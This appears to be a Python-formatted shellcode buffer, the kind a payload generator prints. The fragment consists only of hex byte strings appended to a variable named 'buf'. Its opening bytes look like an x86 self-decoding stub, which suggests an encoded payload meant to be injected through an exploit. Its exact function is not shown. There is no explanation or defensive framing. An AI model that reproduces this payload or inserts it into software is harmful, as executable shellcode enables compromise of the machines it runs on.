buf =  b""
buf += b"\xd9\xce\xd9\x74\x24\xf4\xb8\xda\x9e\x35\x96\x5d\x29"
buf += b"\xc9\xb1\x1f\x31\x45\x1a\x03\x45\x1a\x83\xed\xfc\xe2"
buf += b"\x2f\xf4\x3f\xc8\xfe\xd2\xb7\x17\x53\xa6\x64\xb2\x51"
buf += b"\x98\xed\xcb\xb4\x15\x71\x5c\x6d\xce\x78\x6a\x91\xa6"
buf += b"\x15\x6e\x91\xa7\xb9\xe7\x70\xad\x27\xa0\x22\x63\xff"
buf += b"\xd9\x23\xc0\x32\x59\x26\x07\xb5\x43\x66\xfc\x7b\x1c"
buf += b"\xd4\xfc\x83\xdc\x40\x97\x83\xb6\x75\xee\x67\x77\xbc"
buf += b"\x3d\xe7\xfd\xfe\xc7\x55\x16\xd9\x85\xa1\x50\x25\xfa"
buf += b"\xad\xa2\xac\x19\x6c\x49\xa2\x1c\x8c\x82\x0a\xe3\x9e"
buf += b"\x1b\xef\xdc\x59\x0c\xb4\x55\x78\xb5\xf8\x42\xcb\xc5"
buf += b"\x31\x0a\xae\x0a\xb1\x09\x4e\x6b\xf9\x0f\xb0\x6c\xf9"
buf += b"\xb4\xb1\x6c\xf9\xca\x7c\xec"
